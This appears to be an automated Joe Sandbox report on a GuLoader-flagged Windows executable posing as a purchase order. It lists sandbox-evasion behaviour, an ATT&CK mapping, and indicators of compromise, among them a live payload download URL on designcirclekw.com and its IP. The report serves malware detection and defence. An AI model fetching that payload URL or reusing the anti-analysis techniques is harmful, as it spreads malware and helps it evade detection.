      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeFile created: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeAPI/Special instruction interceptor: Address: 7056CCE
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeAPI/Special instruction interceptor: Address: 4016CCE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeRDTSC instruction interceptor: First address: 6FFA451 second address: 6FFA451 instructions: 0x00000000 rdtsc 0x00000002 test cx, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2D3524E3E3h 0x00000009 test dh, ch 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeRDTSC instruction interceptor: First address: 3FBA451 second address: 3FBA451 instructions: 0x00000000 rdtsc 0x00000002 test cx, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F2D34BE3023h 0x00000009 test dh, ch 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe TID: 6768Thread sleep count: 55 > 30Jump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe TID: 6768Thread sleep time: -550000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181486135.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3122910329.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269183422.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220490283.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201099129.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3373052656.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3102891267.00000000075CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeAPI call chain: ExitProcess graph end nodegraph_0-4186
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeAPI call chain: ExitProcess graph end nodegraph_0-4335
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeProcess created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"Jump to behavior
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00405D2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D2E

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PO-10212024168877 PNG2023-W101.exe53%ReversingLabsWin32.Trojan.Guloader
      PO-10212024168877 PNG2023-W101.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      designcirclekw.com
      		62.215.181.250
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binfalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://designcirclekw.com/ler/extension/extension/zXcMABFvBCAfEn173.binPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3122796477.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdPO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
              		unknown
              https://designcirclekw.com/4PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950356283.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2950463769.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://designcirclekw.com/tPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorPO-10212024168877 PNG2023-W101.exe, PO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://designcirclekw.com/vPO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bindPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin)PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832627511.00000000075DA000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2832535674.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2813443365.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                          		unknown
                          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
                            		unknown
                            http://www.ftp.ftp://ftp.gopher.PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                              		unknown
                              https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binQPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://designcirclekw.com/$PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://designcirclekw.com/dmin/controller/extension/extension/zXcMABFvBCAfEn173.binBFvBCAfEn173.binPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://nsis.sf.net/NSIS_ErrorErrorPO-10212024168877 PNG2023-W101.exe, 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000000.00000000.1445303761.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://designcirclekw.com/FPO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin5PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://designcirclekw.com/PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2890472384.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2871405171.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2852037864.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binlIaPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://designcirclekw.com/lPO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binTfPO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                62.215.181.250
                                                		designcirclekw.comKuwait
                                                		21050FAST-TELCOKWfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1544856
                                                Start date and time:2024-10-29 20:34:21 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 44s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PO-10212024168877 PNG2023-W101.exe
                                                Detection:MAL
                                                Classification:mal72.troj.evad.winEXE@3/11@1/1
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 88%
                                                • Number of executed functions: 45
                                                • Number of non-executed functions: 29
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: PO-10212024168877 PNG2023-W101.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                15:37:35API Interceptor55x Sleep call for process: PO-10212024168877 PNG2023-W101.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                FAST-TELCOKW6DroQ0jTFY.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.147.81
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.147.66
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.147.73
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.147.85
                                                jade.mips.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.172.72
                                                SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.196.18
                                                mirai.arm.elfGet hashmaliciousMiraiBrowse
                                                • 83.96.72.3
                                                firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                • 83.96.34.117
                                                jQ0zXV2d1X.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.92.250
                                                sora.x86.elfGet hashmaliciousMiraiBrowse
                                                • 62.215.147.92

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e192DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.215.181.250
                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                • 62.215.181.250
                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                • 62.215.181.250
                                                rRFQSMRT-241883-2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 62.215.181.250
                                                DividasAtivas_tgj.vbsGet hashmaliciousUnknownBrowse
                                                • 62.215.181.250
                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                • 62.215.181.250
                                                audiosrv.dllGet hashmaliciousMatanbuchusBrowse
                                                • 62.215.181.250
                                                audiosrv.dllGet hashmaliciousMatanbuchusBrowse
                                                • 62.215.181.250
                                                yolo.dllGet hashmaliciousUnknownBrowse
                                                • 62.215.181.250
                                                Markus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 62.215.181.250

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dllPO-000041522.exeGet hashmaliciousFormBookBrowse
                                                  PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                    SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exeGet hashmaliciousUnknownBrowse
                                                      cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                          cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                              rResegregation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                rResegregation.exeGet hashmaliciousGuLoaderBrowse
                                                                  W1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse

                                                                    Created / dropped Files

